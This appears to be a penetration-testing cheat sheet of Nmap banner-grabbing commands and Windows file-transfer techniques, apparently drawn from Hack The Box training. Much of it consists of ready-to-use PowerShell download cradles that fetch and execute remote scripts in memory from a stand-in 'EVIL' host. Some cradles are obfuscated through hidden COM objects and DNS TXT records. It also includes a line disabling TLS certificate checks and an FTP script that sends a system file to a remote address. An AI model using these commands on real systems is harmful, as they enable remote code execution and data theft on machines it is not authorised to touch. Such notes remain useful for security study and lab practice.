Cheatsheet

Nmap

Running an Nmap Script

nmap --script <SCRIPT_NAME> -p<PORT> <DOMAIN/IPADDRESS>

Banner Grabbing

nmap -sV --script=banner <DOMAIN/IPADDRESS>

netcat <IP_ADDRESS> <PORT>

nc -nv <IP_ADDRESS> <PORT>

curl -IL <DOMAIN>

Windows File Transfer Methods (Download Operations)

PowerShell Base64 Encode & Decode

Downloading from Linux machine to Windows machine using Base64

On Linux Machine

cat <FILE> | base64 -w 0;echo

On Windows Machine

[IO.File]::WriteAllBytes("C:\<LOCATION>\<FILENAME>", [Convert]::FromBase64String("<BASE64>"))

PowerShell Web Downloads

PowerShell DownloadFile Method

(New-Object Net.WebClient).DownloadFile('<URL>','C:\<LOCATION>\<FILENAME>')

(New-Object Net.WebClient).DownloadFileAsync('<URL>','C:\<LOCATION>\<FILENAME>')

PowerShell DownloadString - Fileless Method

Executes directly to the memory

IEX (New-Object Net.WebClient).DownloadString('<URL>')

(New-Object Net.WebClient).DownloadString('<URL>') | IEX

PowerShell Invoke-WebRequest

Alternative (Fast)

iwr
curl
wget

Invoke-WebRequest <URL> -OutFile <FILENAME>`

PowerShell Cradles

From HarmJ0y, https://gist.github.com/HarmJ0y/bb48307ffa663256e239

# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')

# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

# Msxml2.XMLHTTP COM object
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText

# WinHttp COM object (not proxy aware!)
$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText

# using bitstransfer- touches disk!
Import-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r

# DNS TXT approach from PowerBreach (https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1)
#   code to execute needs to be a base64 encoded string stored in a TXT record
IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))

# from @subtee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d
<#
<?xml version="1.0"?>
<command>
   <a>
      <execute>Get-Process</execute>
   </a>
  </command>
#>
$a = New-Object System.Xml.XmlDocument
$a.Load("https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt")
$a.command.a.execute | iex

UseBasicParsing Error

Invoke-WebRequest <URL> -UseBasicParsing | IEX

Could not establish relationship (SSL/TLS Certificate is not trusted)

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

SMB Downloads

No Authentication

On Linux, create SMB Server

sudo impacket-smbserver share -smb2support /tmp/smbshare

On Windows, copy the file from SMB Server

copy \\<IPADRESS>\share\<FILENAME>

With Authentication

On Linux, create SMB Server with username and password

sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test

On Windows, mount SMB Server with username and password

net use n: \\<IPADRESS>\share /user:<USERNAME> <PASSWORD>

copy n:\<FILENAME>

FTP Downloads

Using pyftpdlib

On Linux, set up FTP Server

sudo pip3 install pyftpdlib
sudo python3 -m pyftpdlib --port 21

On Windows, transfer files from FTP Server using PowerShell

(New-Object Net.WebClient).DownloadFile('ftp://<IPADDRESS>/<FILENAME>', 'C:\<LOCATION>\<FILENAME>')

Create a Command File for the FTP Client and Download the Target File

C:\htb> echo open 192.168.49.128 > ftpcommand.txt
C:\htb> echo USER anonymous >> ftpcommand.txt
C:\htb> echo binary >> ftpcommand.txt
C:\htb> echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt
C:\htb> echo bye >> ftpcommand.txt
C:\htb> ftp -v -n -s:ftpcommand.txt
ftp> open 192.168.49.128

Log in with USER and PASS first.


ftp> USER anonymous
ftp> PUT c:\windows\system32\drivers\etc\hosts
ftp> bye

Windows File Transfer Methods (Upload Operations)

Last updated 1 month ago

hashtagNmap

hashtagRunning an Nmap Script

hashtagBanner Grabbing

hashtagWindows File Transfer Methods (Download Operations)

hashtagPowerShell Base64 Encode & Decode

hashtagPowerShell Web Downloads

hashtagPowerShell DownloadFile Method

hashtagPowerShell DownloadString - Fileless Method

hashtagPowerShell Invoke-WebRequest

hashtagPowerShell Cradles

hashtagUseBasicParsing Error

hashtagCould not establish relationship (SSL/TLS Certificate is not trusted)

hashtagSMB Downloads

hashtagNo Authentication

hashtagWith Authentication

hashtagFTP Downloads

hashtagUsing pyftpdlib

hashtagCreate a Command File for the FTP Client and Download the Target File

hashtagWindows File Transfer Methods (Upload Operations)